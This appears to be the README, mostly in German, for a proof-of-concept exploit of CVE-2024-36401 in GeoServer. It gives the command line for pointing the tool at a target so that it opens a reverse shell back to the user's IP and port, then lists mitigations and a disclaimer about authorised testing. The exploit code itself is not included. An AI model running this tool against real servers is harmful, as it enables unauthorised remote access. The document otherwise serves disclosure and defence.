
POC for CVE-2024-36401. This POC will attempt to establish a reverse shell from the vlun targets.
POC für CVE-2024-36401 GeoServer. Dieser POC versucht, eine Reverse-System-Shell von den Zielen herzustellen.

POC für CVE-2024-36401: RCE für GeoServer-Versionen vor 2.25.1, 2.24.3 und 2.23.5 von GeoServer. Dieser POC basiert auf der Sicherheitswarnung von phith0n.
Dieser POC versucht, eine Reverse-Shell von den verwundbaren Zielen herzustellen. Er soll gegen verwundbare Linux-Ziele funktionieren. Sie benötigen einen Rechner mit einer veröffentlichten und erreichbaren IP, um diesen POC auszuführen.
requests-BibliothekUm diesen POC gegen ein einzelnes Ziel zu verwenden:
python CVE-2024-36401.py -u HTTP://TARGET:9090 -ip YOUR-IP -port LOCAL-PORT-NUMBER -type GeoServer-Object-Type
Hilfe:
python3 CVE-2024-36401.py -h
options:
-h, --help show this help message and exit
-u U Target, example https://target:8080
-ip IP Your IP, example 192.168.1.1
-port PORT Port, example 1337
-type TYPE Type, example sf:archsites
Deaktivieren Sie WFS-Anfragen.
Sichern Sie Ihr Linux, indem Sie iptables so konfigurieren, dass Reverse-Verbindungen deaktiviert werden, Standardrichtlinien auf Verwerfen des gesamten Datenverkehrs setzen, etablierte und zugehörige Verbindungen zulassen und nur essenziellen ausgehenden Verkehr wie DNS, HTTP und HTTPS erlauben.
Oder aktualisieren Sie auf die neueste Version von GeoServer.
Bei Vorschlägen oder Gedanken wenden Sie sich bitte an mich.
Ich erstelle meine eigenen Tools gerne nur zum Spaß, für die Arbeit und zu Bildungszwecken. Ich unterstütze oder fördere kein Hacking oder unbefugten Zugriff auf Systeme oder Netzwerke. Bitte verwenden Sie meine Tools verantwortungsbewusst und nur auf Systemen, für die Sie eine klare Erlaubnis zum Testen haben.